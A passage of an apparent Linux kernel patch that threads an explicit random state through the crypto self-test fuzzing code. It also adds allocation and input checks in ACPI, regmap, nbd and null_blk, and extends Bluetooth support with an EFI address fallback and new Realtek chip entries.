+ 	const unsigned int maxdatasize = (2 * PAGE_SIZE) - TESTMGR_POISON_LEN;
+ 	const char *algname = crypto_hash_alg_common(tfm)->base.cra_name;
+ 	const char *driver = crypto_ahash_driver_name(tfm);
++	struct rnd_state rng;
+ 	char _generic_driver[CRYPTO_MAX_ALG_NAME];
+ 	struct crypto_shash *generic_tfm = NULL;
+ 	struct shash_desc *generic_desc = NULL;
+@@ -1701,6 +1749,8 @@ static int test_hash_vs_generic_impl(const char *generic_driver,
+ 	if (noextratests)
+ 		return 0;
+ 
++	init_rnd_state(&rng);
++
+ 	if (!generic_driver) { /* Use default naming convention? */
+ 		err = build_generic_driver_name(algname, _generic_driver);
+ 		if (err)
+@@ -1769,10 +1819,11 @@ static int test_hash_vs_generic_impl(const char *generic_driver,
+ 	}
+ 
+ 	for (i = 0; i < fuzz_iterations * 8; i++) {
+-		generate_random_hash_testvec(generic_desc, &vec,
++		generate_random_hash_testvec(&rng, generic_desc, &vec,
+ 					     maxkeysize, maxdatasize,
+ 					     vec_name, sizeof(vec_name));
+-		generate_random_testvec_config(cfg, cfgname, sizeof(cfgname));
++		generate_random_testvec_config(&rng, cfg, cfgname,
++					       sizeof(cfgname));
+ 
+ 		err = test_hash_vec_cfg(&vec, vec_name, cfg,
+ 					req, desc, tsgl, hashstate);
+@@ -2174,11 +2225,14 @@ static int test_aead_vec(int enc, const struct aead_testvec *vec,
+ 
+ #ifdef CONFIG_CRYPTO_MANAGER_EXTRA_TESTS
+ 	if (!noextratests) {
++		struct rnd_state rng;
+ 		struct testvec_config cfg;
+ 		char cfgname[TESTVEC_CONFIG_NAMELEN];
+ 
++		init_rnd_state(&rng);
++
+ 		for (i = 0; i < fuzz_iterations; i++) {
+-			generate_random_testvec_config(&cfg, cfgname,
++			generate_random_testvec_config(&rng, &cfg, cfgname,
+ 						       sizeof(cfgname));
+ 			err = test_aead_vec_cfg(enc, vec, vec_name,
+ 						&cfg, req, tsgls);
+@@ -2194,6 +2248,7 @@ static int test_aead_vec(int enc, const struct aead_testvec *vec,
+ #ifdef CONFIG_CRYPTO_MANAGER_EXTRA_TESTS
+ 
+ struct aead_extra_tests_ctx {
++	struct rnd_state rng;
+ 	struct aead_request *req;
+ 	struct crypto_aead *tfm;
+ 	const struct alg_test_desc *test_desc;
+@@ -2212,24 +2267,26 @@ struct aead_extra_tests_ctx {
+  * here means the full ciphertext including the authentication tag.  The
+  * authentication tag (and hence also the ciphertext) is assumed to be nonempty.
+  */
+-static void mutate_aead_message(struct aead_testvec *vec, bool aad_iv,
++static void mutate_aead_message(struct rnd_state *rng,
++				struct aead_testvec *vec, bool aad_iv,
+ 				unsigned int ivsize)
+ {
+ 	const unsigned int aad_tail_size = aad_iv ? ivsize : 0;
+ 	const unsigned int authsize = vec->clen - vec->plen;
+ 
+-	if (prandom_u32_max(2) == 0 && vec->alen > aad_tail_size) {
++	if (prandom_bool(rng) && vec->alen > aad_tail_size) {
+ 		 /* Mutate the AAD */
+-		flip_random_bit((u8 *)vec->assoc, vec->alen - aad_tail_size);
+-		if (prandom_u32_max(2) == 0)
++		flip_random_bit(rng, (u8 *)vec->assoc,
++				vec->alen - aad_tail_size);
++		if (prandom_bool(rng))
+ 			return;
+ 	}
+-	if (prandom_u32_max(2) == 0) {
++	if (prandom_bool(rng)) {
+ 		/* Mutate auth tag (assuming it's at the end of ciphertext) */
+-		flip_random_bit((u8 *)vec->ctext + vec->plen, authsize);
++		flip_random_bit(rng, (u8 *)vec->ctext + vec->plen, authsize);
+ 	} else {
+ 		/* Mutate any part of the ciphertext */
+-		flip_random_bit((u8 *)vec->ctext, vec->clen);
++		flip_random_bit(rng, (u8 *)vec->ctext, vec->clen);
+ 	}
+ }
+ 
+@@ -2240,7 +2297,8 @@ static void mutate_aead_message(struct aead_testvec *vec, bool aad_iv,
+  */
+ #define MIN_COLLISION_FREE_AUTHSIZE 8
+ 
+-static void generate_aead_message(struct aead_request *req,
++static void generate_aead_message(struct rnd_state *rng,
++				  struct aead_request *req,
+ 				  const struct aead_test_suite *suite,
+ 				  struct aead_testvec *vec,
+ 				  bool prefer_inauthentic)
+@@ -2249,17 +2307,18 @@ static void generate_aead_message(struct aead_request *req,
+ 	const unsigned int ivsize = crypto_aead_ivsize(tfm);
+ 	const unsigned int authsize = vec->clen - vec->plen;
+ 	const bool inauthentic = (authsize >= MIN_COLLISION_FREE_AUTHSIZE) &&
+-				 (prefer_inauthentic || prandom_u32_max(4) == 0);
++				 (prefer_inauthentic ||
++				  prandom_u32_below(rng, 4) == 0);
+ 
+ 	/* Generate the AAD. */
+-	generate_random_bytes((u8 *)vec->assoc, vec->alen);
++	generate_random_bytes(rng, (u8 *)vec->assoc, vec->alen);
+ 	if (suite->aad_iv && vec->alen >= ivsize)
+ 		/* Avoid implementation-defined behavior. */
+ 		memcpy((u8 *)vec->assoc + vec->alen - ivsize, vec->iv, ivsize);
+ 
+-	if (inauthentic && prandom_u32_max(2) == 0) {
++	if (inauthentic && prandom_bool(rng)) {
+ 		/* Generate a random ciphertext. */
+-		generate_random_bytes((u8 *)vec->ctext, vec->clen);
++		generate_random_bytes(rng, (u8 *)vec->ctext, vec->clen);
+ 	} else {
+ 		int i = 0;
+ 		struct scatterlist src[2], dst;
+@@ -2271,7 +2330,7 @@ static void generate_aead_message(struct aead_request *req,
+ 		if (vec->alen)
+ 			sg_set_buf(&src[i++], vec->assoc, vec->alen);
+ 		if (vec->plen) {
+-			generate_random_bytes((u8 *)vec->ptext, vec->plen);
++			generate_random_bytes(rng, (u8 *)vec->ptext, vec->plen);
+ 			sg_set_buf(&src[i++], vec->ptext, vec->plen);
+ 		}
+ 		sg_init_one(&dst, vec->ctext, vec->alen + vec->clen);
+@@ -2291,7 +2350,7 @@ static void generate_aead_message(struct aead_request *req,
+ 		 * Mutate the authentic (ciphertext, AAD) pair to get an
+ 		 * inauthentic one.
+ 		 */
+-		mutate_aead_message(vec, suite->aad_iv, ivsize);
++		mutate_aead_message(rng, vec, suite->aad_iv, ivsize);
+ 	}
+ 	vec->novrfy = 1;
+ 	if (suite->einval_allowed)
+@@ -2305,7 +2364,8 @@ static void generate_aead_message(struct aead_request *req,
+  * If 'prefer_inauthentic' is true, then this function will generate inauthentic
+  * test vectors (i.e. vectors with 'vec->novrfy=1') more often.
+  */
+-static void generate_random_aead_testvec(struct aead_request *req,
++static void generate_random_aead_testvec(struct rnd_state *rng,
++					 struct aead_request *req,
+ 					 struct aead_testvec *vec,
+ 					 const struct aead_test_suite *suite,
+ 					 unsigned int maxkeysize,
+@@ -2321,18 +2381,18 @@ static void generate_random_aead_testvec(struct aead_request *req,
+ 
+ 	/* Key: length in [0, maxkeysize], but usually choose maxkeysize */
+ 	vec->klen = maxkeysize;
+-	if (prandom_u32_max(4) == 0)
+-		vec->klen = prandom_u32_max(maxkeysize + 1);
+-	generate_random_bytes((u8 *)vec->key, vec->klen);
++	if (prandom_u32_below(rng, 4) == 0)
++		vec->klen = prandom_u32_below(rng, maxkeysize + 1);
++	generate_random_bytes(rng, (u8 *)vec->key, vec->klen);
+ 	vec->setkey_error = crypto_aead_setkey(tfm, vec->key, vec->klen);
+ 
+ 	/* IV */
+-	generate_random_bytes((u8 *)vec->iv, ivsize);
++	generate_random_bytes(rng, (u8 *)vec->iv, ivsize);
+ 
+ 	/* Tag length: in [0, maxauthsize], but usually choose maxauthsize */
+ 	authsize = maxauthsize;
+-	if (prandom_u32_max(4) == 0)
+-		authsize = prandom_u32_max(maxauthsize + 1);
++	if (prandom_u32_below(rng, 4) == 0)
++		authsize = prandom_u32_below(rng, maxauthsize + 1);
+ 	if (prefer_inauthentic && authsize < MIN_COLLISION_FREE_AUTHSIZE)
+ 		authsize = MIN_COLLISION_FREE_AUTHSIZE;
+ 	if (WARN_ON(authsize > maxdatasize))
+@@ -2341,11 +2401,11 @@ static void generate_random_aead_testvec(struct aead_request *req,
+ 	vec->setauthsize_error = crypto_aead_setauthsize(tfm, authsize);
+ 
+ 	/* AAD, plaintext, and ciphertext lengths */
+-	total_len = generate_random_length(maxdatasize);
+-	if (prandom_u32_max(4) == 0)
++	total_len = generate_random_length(rng, maxdatasize);
++	if (prandom_u32_below(rng, 4) == 0)
+ 		vec->alen = 0;
+ 	else
+-		vec->alen = generate_random_length(total_len);
++		vec->alen = generate_random_length(rng, total_len);
+ 	vec->plen = total_len - vec->alen;
+ 	vec->clen = vec->plen + authsize;
+ 
+@@ -2356,7 +2416,7 @@ static void generate_random_aead_testvec(struct aead_request *req,
+ 	vec->novrfy = 0;
+ 	vec->crypt_error = 0;
+ 	if (vec->setkey_error == 0 && vec->setauthsize_error == 0)
+-		generate_aead_message(req, suite, vec, prefer_inauthentic);
++		generate_aead_message(rng, req, suite, vec, prefer_inauthentic);
+ 	snprintf(name, max_namelen,
+ 		 "\"random: alen=%u plen=%u authsize=%u klen=%u novrfy=%d\"",
+ 		 vec->alen, vec->plen, authsize, vec->klen, vec->novrfy);
+@@ -2368,7 +2428,7 @@ static void try_to_generate_inauthentic_testvec(
+ 	int i;
+ 
+ 	for (i = 0; i < 10; i++) {
+-		generate_random_aead_testvec(ctx->req, &ctx->vec,
++		generate_random_aead_testvec(&ctx->rng, ctx->req, &ctx->vec,
+ 					     &ctx->test_desc->suite.aead,
+ 					     ctx->maxkeysize, ctx->maxdatasize,
+ 					     ctx->vec_name,
+@@ -2399,7 +2459,8 @@ static int test_aead_inauthentic_inputs(struct aead_extra_tests_ctx *ctx)
+ 		 */
+ 		try_to_generate_inauthentic_testvec(ctx);
+ 		if (ctx->vec.novrfy) {
+-			generate_random_testvec_config(&ctx->cfg, ctx->cfgname,
++			generate_random_testvec_config(&ctx->rng, &ctx->cfg,
++						       ctx->cfgname,
+ 						       sizeof(ctx->cfgname));
+ 			err = test_aead_vec_cfg(DECRYPT, &ctx->vec,
+ 						ctx->vec_name, &ctx->cfg,
+@@ -2489,12 +2550,13 @@ static int test_aead_vs_generic_impl(struct aead_extra_tests_ctx *ctx)
+ 	 * the other implementation against them.
+ 	 */
+ 	for (i = 0; i < fuzz_iterations * 8; i++) {
+-		generate_random_aead_testvec(generic_req, &ctx->vec,
++		generate_random_aead_testvec(&ctx->rng, generic_req, &ctx->vec,
+ 					     &ctx->test_desc->suite.aead,
+ 					     ctx->maxkeysize, ctx->maxdatasize,
+ 					     ctx->vec_name,
+ 					     sizeof(ctx->vec_name), false);
+-		generate_random_testvec_config(&ctx->cfg, ctx->cfgname,
++		generate_random_testvec_config(&ctx->rng, &ctx->cfg,
++					       ctx->cfgname,
+ 					       sizeof(ctx->cfgname));
+ 		if (!ctx->vec.novrfy) {
+ 			err = test_aead_vec_cfg(ENCRYPT, &ctx->vec,
+@@ -2533,6 +2595,7 @@ static int test_aead_extra(const struct alg_test_desc *test_desc,
+ 	ctx = kzalloc(sizeof(*ctx), GFP_KERNEL);
+ 	if (!ctx)
+ 		return -ENOMEM;
++	init_rnd_state(&ctx->rng);
+ 	ctx->req = req;
+ 	ctx->tfm = crypto_aead_reqtfm(req);
+ 	ctx->test_desc = test_desc;
+@@ -2922,11 +2985,14 @@ static int test_skcipher_vec(int enc, const struct cipher_testvec *vec,
+ 
+ #ifdef CONFIG_CRYPTO_MANAGER_EXTRA_TESTS
+ 	if (!noextratests) {
++		struct rnd_state rng;
+ 		struct testvec_config cfg;
+ 		char cfgname[TESTVEC_CONFIG_NAMELEN];
+ 
++		init_rnd_state(&rng);
++
+ 		for (i = 0; i < fuzz_iterations; i++) {
+-			generate_random_testvec_config(&cfg, cfgname,
++			generate_random_testvec_config(&rng, &cfg, cfgname,
+ 						       sizeof(cfgname));
+ 			err = test_skcipher_vec_cfg(enc, vec, vec_name,
+ 						    &cfg, req, tsgls);
+@@ -2944,7 +3010,8 @@ static int test_skcipher_vec(int enc, const struct cipher_testvec *vec,
+  * Generate a symmetric cipher test vector from the given implementation.
+  * Assumes the buffers in 'vec' were already allocated.
+  */
+-static void generate_random_cipher_testvec(struct skcipher_request *req,
++static void generate_random_cipher_testvec(struct rnd_state *rng,
++					   struct skcipher_request *req,
+ 					   struct cipher_testvec *vec,
+ 					   unsigned int maxdatasize,
+ 					   char *name, size_t max_namelen)
+@@ -2958,17 +3025,17 @@ static void generate_random_cipher_testvec(struct skcipher_request *req,
+ 
+ 	/* Key: length in [0, maxkeysize], but usually choose maxkeysize */
+ 	vec->klen = maxkeysize;
+-	if (prandom_u32_max(4) == 0)
+-		vec->klen = prandom_u32_max(maxkeysize + 1);
+-	generate_random_bytes((u8 *)vec->key, vec->klen);
++	if (prandom_u32_below(rng, 4) == 0)
++		vec->klen = prandom_u32_below(rng, maxkeysize + 1);
++	generate_random_bytes(rng, (u8 *)vec->key, vec->klen);
+ 	vec->setkey_error = crypto_skcipher_setkey(tfm, vec->key, vec->klen);
+ 
+ 	/* IV */
+-	generate_random_bytes((u8 *)vec->iv, ivsize);
++	generate_random_bytes(rng, (u8 *)vec->iv, ivsize);
+ 
+ 	/* Plaintext */
+-	vec->len = generate_random_length(maxdatasize);
+-	generate_random_bytes((u8 *)vec->ptext, vec->len);
++	vec->len = generate_random_length(rng, maxdatasize);
++	generate_random_bytes(rng, (u8 *)vec->ptext, vec->len);
+ 
+ 	/* If the key couldn't be set, no need to continue to encrypt. */
+ 	if (vec->setkey_error)
+@@ -3010,6 +3077,7 @@ static int test_skcipher_vs_generic_impl(const char *generic_driver,
+ 	const unsigned int maxdatasize = (2 * PAGE_SIZE) - TESTMGR_POISON_LEN;
+ 	const char *algname = crypto_skcipher_alg(tfm)->base.cra_name;
+ 	const char *driver = crypto_skcipher_driver_name(tfm);
++	struct rnd_state rng;
+ 	char _generic_driver[CRYPTO_MAX_ALG_NAME];
+ 	struct crypto_skcipher *generic_tfm = NULL;
+ 	struct skcipher_request *generic_req = NULL;
+@@ -3027,6 +3095,8 @@ static int test_skcipher_vs_generic_impl(const char *generic_driver,
+ 	if (strncmp(algname, "kw(", 3) == 0)
+ 		return 0;
+ 
++	init_rnd_state(&rng);
++
+ 	if (!generic_driver) { /* Use default naming convention? */
+ 		err = build_generic_driver_name(algname, _generic_driver);
+ 		if (err)
+@@ -3111,9 +3181,11 @@ static int test_skcipher_vs_generic_impl(const char *generic_driver,
+ 	}
+ 
+ 	for (i = 0; i < fuzz_iterations * 8; i++) {
+-		generate_random_cipher_testvec(generic_req, &vec, maxdatasize,
++		generate_random_cipher_testvec(&rng, generic_req, &vec,
++					       maxdatasize,
+ 					       vec_name, sizeof(vec_name));
+-		generate_random_testvec_config(cfg, cfgname, sizeof(cfgname));
++		generate_random_testvec_config(&rng, cfg, cfgname,
++					       sizeof(cfgname));
+ 
+ 		err = test_skcipher_vec_cfg(ENCRYPT, &vec, vec_name,
+ 					    cfg, req, tsgls);
+diff --git a/drivers/acpi/acpi_apd.c b/drivers/acpi/acpi_apd.c
+index 3bbe2276cac76..80f945cbec8a7 100644
+--- a/drivers/acpi/acpi_apd.c
++++ b/drivers/acpi/acpi_apd.c
+@@ -83,6 +83,8 @@ static int fch_misc_setup(struct apd_private_data *pdata)
+ 	if (!acpi_dev_get_property(adev, "clk-name", ACPI_TYPE_STRING, &obj)) {
+ 		clk_data->name = devm_kzalloc(&adev->dev, obj->string.length,
+ 					      GFP_KERNEL);
++		if (!clk_data->name)
++			return -ENOMEM;
+ 
+ 		strcpy(clk_data->name, obj->string.pointer);
+ 	} else {
+diff --git a/drivers/acpi/acpica/dbnames.c b/drivers/acpi/acpica/dbnames.c
+index 3615e1a6efd8a..b91155ea9c343 100644
+--- a/drivers/acpi/acpica/dbnames.c
++++ b/drivers/acpi/acpica/dbnames.c
+@@ -652,6 +652,9 @@ acpi_status acpi_db_display_objects(char *obj_type_arg, char *display_count_arg)
+ 		object_info =
+ 		    ACPI_ALLOCATE_ZEROED(sizeof(struct acpi_object_info));
+ 
++		if (!object_info)
++			return (AE_NO_MEMORY);
++
+ 		/* Walk the namespace from the root */
+ 
+ 		(void)acpi_walk_namespace(ACPI_TYPE_ANY, ACPI_ROOT_OBJECT,
+diff --git a/drivers/acpi/acpica/dswstate.c b/drivers/acpi/acpica/dswstate.c
+index 0aa735d3b93cc..77076da2029d9 100644
+--- a/drivers/acpi/acpica/dswstate.c
++++ b/drivers/acpi/acpica/dswstate.c
+@@ -576,9 +576,14 @@ acpi_ds_init_aml_walk(struct acpi_walk_state *walk_state,
+ 	ACPI_FUNCTION_TRACE(ds_init_aml_walk);
+ 
+ 	walk_state->parser_state.aml =
+-	    walk_state->parser_state.aml_start = aml_start;
+-	walk_state->parser_state.aml_end =
+-	    walk_state->parser_state.pkg_end = aml_start + aml_length;
++	    walk_state->parser_state.aml_start =
++	    walk_state->parser_state.aml_end =
++	    walk_state->parser_state.pkg_end = aml_start;
++	/* Avoid undefined behavior: applying zero offset to null pointer */
++	if (aml_length != 0) {
++		walk_state->parser_state.aml_end += aml_length;
++		walk_state->parser_state.pkg_end += aml_length;
++	}
+ 
+ 	/* The next_op of the next_walk will be the beginning of the method */
+ 
+diff --git a/drivers/acpi/ec.c b/drivers/acpi/ec.c
+index 9751b84c1b221..ee4c812c8f6cc 100644
+--- a/drivers/acpi/ec.c
++++ b/drivers/acpi/ec.c
+@@ -1121,6 +1121,7 @@ static void acpi_ec_remove_query_handlers(struct acpi_ec *ec,
+ void acpi_ec_remove_query_handler(struct acpi_ec *ec, u8 query_bit)
+ {
+ 	acpi_ec_remove_query_handlers(ec, false, query_bit);
++	flush_workqueue(ec_query_wq);
+ }
+ EXPORT_SYMBOL_GPL(acpi_ec_remove_query_handler);
+ 
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index 0556c4720d3fa..b6d429a2bcb62 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -130,12 +130,6 @@ static int video_detect_force_native(const struct dmi_system_id *d)
+ 	return 0;
+ }
+ 
+-static int video_detect_force_none(const struct dmi_system_id *d)
+-{
+-	acpi_backlight_dmi = acpi_backlight_none;
+-	return 0;
+-}
+-
+ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 	/*
+ 	 * Models which should use the vendor backlight interface,
+@@ -752,35 +746,6 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 		DMI_MATCH(DMI_PRODUCT_NAME, "Vostro 15 3535"),
+ 		},
+ 	},
+-
+-	/*
+-	 * Desktops which falsely report a backlight and which our heuristics
+-	 * for this do not catch.
+-	 */
+-	{
+-	 .callback = video_detect_force_none,
+-	 /* Dell OptiPlex 9020M */
+-	 .matches = {
+-		DMI_MATCH(DMI_SYS_VENDOR, "Dell Inc."),
+-		DMI_MATCH(DMI_PRODUCT_NAME, "OptiPlex 9020M"),
+-		},
+-	},
+-	{
+-	 .callback = video_detect_force_none,
+-	 /* GIGABYTE GB-BXBT-2807 */
+-	 .matches = {
+-		DMI_MATCH(DMI_SYS_VENDOR, "GIGABYTE"),
+-		DMI_MATCH(DMI_PRODUCT_NAME, "GB-BXBT-2807"),
+-		},
+-	},
+-	{
+-	 .callback = video_detect_force_none,
+-	 /* MSI MS-7721 */
+-	 .matches = {
+-		DMI_MATCH(DMI_SYS_VENDOR, "MSI"),
+-		DMI_MATCH(DMI_PRODUCT_NAME, "MS-7721"),
+-		},
+-	},
+ 	{ },
+ };
+ 
+diff --git a/drivers/base/platform.c b/drivers/base/platform.c
+index 51bb2289865c7..3a06c214ca1c6 100644
+--- a/drivers/base/platform.c
++++ b/drivers/base/platform.c
+@@ -1416,7 +1416,9 @@ static void platform_remove(struct device *_dev)
+ 	struct platform_driver *drv = to_platform_driver(_dev->driver);
+ 	struct platform_device *dev = to_platform_device(_dev);
+ 
+-	if (drv->remove) {
++	if (drv->remove_new) {
++		drv->remove_new(dev);
++	} else if (drv->remove) {
+ 		int ret = drv->remove(dev);
+ 
+ 		if (ret)
+diff --git a/drivers/base/regmap/regcache.c b/drivers/base/regmap/regcache.c
+index 362e043e26d86..8031007b4887d 100644
+--- a/drivers/base/regmap/regcache.c
++++ b/drivers/base/regmap/regcache.c
+@@ -349,6 +349,9 @@ int regcache_sync(struct regmap *map)
+ 	const char *name;
+ 	bool bypass;
+ 
++	if (WARN_ON(map->cache_type == REGCACHE_NONE))
++		return -EINVAL;
++
+ 	BUG_ON(!map->cache_ops);
+ 
+ 	map->lock(map->lock_arg);
+@@ -418,6 +421,9 @@ int regcache_sync_region(struct regmap *map, unsigned int min,
+ 	const char *name;
+ 	bool bypass;
+ 
++	if (WARN_ON(map->cache_type == REGCACHE_NONE))
++		return -EINVAL;
++
+ 	BUG_ON(!map->cache_ops);
+ 
+ 	map->lock(map->lock_arg);
+diff --git a/drivers/block/nbd.c b/drivers/block/nbd.c
+index e379ccc63c520..888a6abb50f53 100644
+--- a/drivers/block/nbd.c
++++ b/drivers/block/nbd.c
+@@ -325,6 +325,9 @@ static int nbd_set_size(struct nbd_device *nbd, loff_t bytesize,
+ 	if (blk_validate_block_size(blksize))
+ 		return -EINVAL;
+ 
++	if (bytesize < 0)
++		return -EINVAL;
++
+ 	nbd->config->bytesize = bytesize;
+ 	nbd->config->blksize_bits = __ffs(blksize);
+ 
+@@ -1110,6 +1113,9 @@ static int nbd_add_socket(struct nbd_device *nbd, unsigned long arg,
+ 	struct nbd_sock *nsock;
+ 	int err;
+ 
++	/* Arg will be cast to int, check it to avoid overflow */
++	if (arg > INT_MAX)
++		return -EINVAL;
+ 	sock = nbd_get_socket(nbd, arg, &err);
+ 	if (!sock)
+ 		return err;
+diff --git a/drivers/block/null_blk/main.c b/drivers/block/null_blk/main.c
+index af419af9a0f4a..c45d09a9a9421 100644
+--- a/drivers/block/null_blk/main.c
++++ b/drivers/block/null_blk/main.c
+@@ -1945,6 +1945,11 @@ static int null_init_tag_set(struct nullb *nullb, struct blk_mq_tag_set *set)
+ 
+ static int null_validate_conf(struct nullb_device *dev)
+ {
++	if (dev->queue_mode == NULL_Q_RQ) {
++		pr_err("legacy IO path is no longer available\n");
++		return -EINVAL;
++	}
++
+ 	dev->blocksize = round_down(dev->blocksize, 512);
+ 	dev->blocksize = clamp_t(unsigned int, dev->blocksize, 512, 4096);
+ 
+diff --git a/drivers/bluetooth/btbcm.c b/drivers/bluetooth/btbcm.c
+index 43e98a598bd9a..de2ea589aa49b 100644
+--- a/drivers/bluetooth/btbcm.c
++++ b/drivers/bluetooth/btbcm.c
+@@ -6,6 +6,7 @@
+  *  Copyright (C) 2015  Intel Corporation
+  */
+ 
++#include <linux/efi.h>
+ #include <linux/module.h>
+ #include <linux/firmware.h>
+ #include <linux/dmi.h>
+@@ -34,6 +35,43 @@
+ /* For kmalloc-ing the fw-name array instead of putting it on the stack */
+ typedef char bcm_fw_name[BCM_FW_NAME_LEN];
+ 
++#ifdef CONFIG_EFI
++static int btbcm_set_bdaddr_from_efi(struct hci_dev *hdev)
++{
++	efi_guid_t guid = EFI_GUID(0x74b00bd9, 0x805a, 0x4d61, 0xb5, 0x1f,
++				   0x43, 0x26, 0x81, 0x23, 0xd1, 0x13);
++	bdaddr_t efi_bdaddr, bdaddr;
++	efi_status_t status;
++	unsigned long len;
++	int ret;
++
++	if (!efi_rt_services_supported(EFI_RT_SUPPORTED_GET_VARIABLE))
++		return -EOPNOTSUPP;
++
++	len = sizeof(efi_bdaddr);
++	status = efi.get_variable(L"BDADDR", &guid, NULL, &len, &efi_bdaddr);
++	if (status != EFI_SUCCESS)
++		return -ENXIO;
++
++	if (len != sizeof(efi_bdaddr))
++		return -EIO;
++
++	baswap(&bdaddr, &efi_bdaddr);
++
++	ret = btbcm_set_bdaddr(hdev, &bdaddr);
++	if (ret)
++		return ret;
++
++	bt_dev_info(hdev, "BCM: Using EFI device address (%pMR)", &bdaddr);
++	return 0;
++}
++#else
++static int btbcm_set_bdaddr_from_efi(struct hci_dev *hdev)
++{
++	return -EOPNOTSUPP;
++}
++#endif
++
+ int btbcm_check_bdaddr(struct hci_dev *hdev)
+ {
+ 	struct hci_rp_read_bd_addr *bda;
+@@ -87,9 +125,12 @@ int btbcm_check_bdaddr(struct hci_dev *hdev)
+ 	    !bacmp(&bda->bdaddr, BDADDR_BCM4345C5) ||
+ 	    !bacmp(&bda->bdaddr, BDADDR_BCM43430A0) ||
+ 	    !bacmp(&bda->bdaddr, BDADDR_BCM43341B)) {
+-		bt_dev_info(hdev, "BCM: Using default device address (%pMR)",
+-			    &bda->bdaddr);
+-		set_bit(HCI_QUIRK_INVALID_BDADDR, &hdev->quirks);
++		/* Try falling back to BDADDR EFI variable */
++		if (btbcm_set_bdaddr_from_efi(hdev) != 0) {
++			bt_dev_info(hdev, "BCM: Using default device address (%pMR)",
++				    &bda->bdaddr);
++			set_bit(HCI_QUIRK_INVALID_BDADDR, &hdev->quirks);
++		}
+ 	}
+ 
+ 	kfree_skb(skb);
+diff --git a/drivers/bluetooth/btintel.c b/drivers/bluetooth/btintel.c
+index f6b4b7a1be4cc..bbad1207cdfd8 100644
+--- a/drivers/bluetooth/btintel.c
++++ b/drivers/bluetooth/btintel.c
+@@ -2553,9 +2553,8 @@ static int btintel_setup_combined(struct hci_dev *hdev)
+ 		 */
+ 		set_bit(HCI_QUIRK_WIDEBAND_SPEECH_SUPPORTED, &hdev->quirks);
+ 
+-		/* Valid LE States quirk for GfP */
+-		if (INTEL_HW_VARIANT(ver_tlv.cnvi_bt) == 0x18)
+-			set_bit(HCI_QUIRK_VALID_LE_STATES, &hdev->quirks);
++		/* Apply LE States quirk from solar onwards */
++		set_bit(HCI_QUIRK_VALID_LE_STATES, &hdev->quirks);
+ 
+ 		/* Setup MSFT Extension support */
+ 		btintel_set_msft_opcode(hdev,
+diff --git a/drivers/bluetooth/btrtl.c b/drivers/bluetooth/btrtl.c
+index fb52313a1d45a..ead632595ce06 100644
+--- a/drivers/bluetooth/btrtl.c
++++ b/drivers/bluetooth/btrtl.c
+@@ -17,19 +17,25 @@
+ 
+ #define VERSION "0.1"
+ 
++#define RTL_CHIP_8723CS_CG	3
++#define RTL_CHIP_8723CS_VF	4
++#define RTL_CHIP_8723CS_XX	5
+ #define RTL_EPATCH_SIGNATURE	"Realtech"
++#define RTL_ROM_LMP_8703B	0x8703
+ #define RTL_ROM_LMP_8723A	0x1200
+ #define RTL_ROM_LMP_8723B	0x8723
+ #define RTL_ROM_LMP_8821A	0x8821
+ #define RTL_ROM_LMP_8761A	0x8761
+ #define RTL_ROM_LMP_8822B	0x8822
+ #define RTL_ROM_LMP_8852A	0x8852
++#define RTL_ROM_LMP_8851B	0x8851
+ #define RTL_CONFIG_MAGIC	0x8723ab55
+ 
+ #define IC_MATCH_FL_LMPSUBV	(1 << 0)
+ #define IC_MATCH_FL_HCIREV	(1 << 1)
+ #define IC_MATCH_FL_HCIVER	(1 << 2)
+ #define IC_MATCH_FL_HCIBUS	(1 << 3)
++#define IC_MATCH_FL_CHIP_TYPE	(1 << 4)
+ #define IC_INFO(lmps, hcir, hciv, bus) \
+ 	.match_flags = IC_MATCH_FL_LMPSUBV | IC_MATCH_FL_HCIREV | \
+ 		       IC_MATCH_FL_HCIVER | IC_MATCH_FL_HCIBUS, \
+@@ -51,6 +57,7 @@ enum btrtl_chip_id {
+ 	CHIP_ID_8852A = 18,
+ 	CHIP_ID_8852B = 20,
+ 	CHIP_ID_8852C = 25,
++	CHIP_ID_8851B = 36,
+ };
+ 
+ struct id_table {
+@@ -59,6 +66,7 @@ struct id_table {
+ 	__u16 hci_rev;
+ 	__u8 hci_ver;
+ 	__u8 hci_bus;
++	__u8 chip_type;
+ 	bool config_needed;
+ 	bool has_rom_version;
+ 	bool has_msft_ext;
+@@ -99,6 +107,39 @@ static const struct id_table ic_id_table[] = {
+ 	  .fw_name  = "rtl_bt/rtl8723b_fw.bin",
+ 	  .cfg_name = "rtl_bt/rtl8723b_config" },
+ 
++	/* 8723CS-CG */
++	{ .match_flags = IC_MATCH_FL_LMPSUBV | IC_MATCH_FL_CHIP_TYPE |
++			 IC_MATCH_FL_HCIBUS,
++	  .lmp_subver = RTL_ROM_LMP_8703B,
++	  .chip_type = RTL_CHIP_8723CS_CG,
++	  .hci_bus = HCI_UART,
++	  .config_needed = true,
++	  .has_rom_version = true,
++	  .fw_name  = "rtl_bt/rtl8723cs_cg_fw.bin",
++	  .cfg_name = "rtl_bt/rtl8723cs_cg_config" },
++
++	/* 8723CS-VF */
++	{ .match_flags = IC_MATCH_FL_LMPSUBV | IC_MATCH_FL_CHIP_TYPE |
++			 IC_MATCH_FL_HCIBUS,
++	  .lmp_subver = RTL_ROM_LMP_8703B,
++	  .chip_type = RTL_CHIP_8723CS_VF,
++	  .hci_bus = HCI_UART,
++	  .config_needed = true,
++	  .has_rom_version = true,
++	  .fw_name  = "rtl_bt/rtl8723cs_vf_fw.bin",
++	  .cfg_name = "rtl_bt/rtl8723cs_vf_config" },
++
++	/* 8723CS-XX */
++	{ .match_flags = IC_MATCH_FL_LMPSUBV | IC_MATCH_FL_CHIP_TYPE |
++			 IC_MATCH_FL_HCIBUS,
++	  .lmp_subver = RTL_ROM_LMP_8703B,
++	  .chip_type = RTL_CHIP_8723CS_XX,
++	  .hci_bus = HCI_UART,
++	  .config_needed = true,
++	  .has_rom_version = true,
++	  .fw_name  = "rtl_bt/rtl8723cs_xx_fw.bin",
++	  .cfg_name = "rtl_bt/rtl8723cs_xx_config" },
++
+ 	/* 8723D */
+ 	{ IC_INFO(RTL_ROM_LMP_8723B, 0xd, 0x8, HCI_USB),
+ 	  .config_needed = true,
+@@ -205,10 +246,19 @@ static const struct id_table ic_id_table[] = {
+ 	  .has_msft_ext = true,
+ 	  .fw_name  = "rtl_bt/rtl8852cu_fw.bin",
+ 	  .cfg_name = "rtl_bt/rtl8852cu_config" },
++
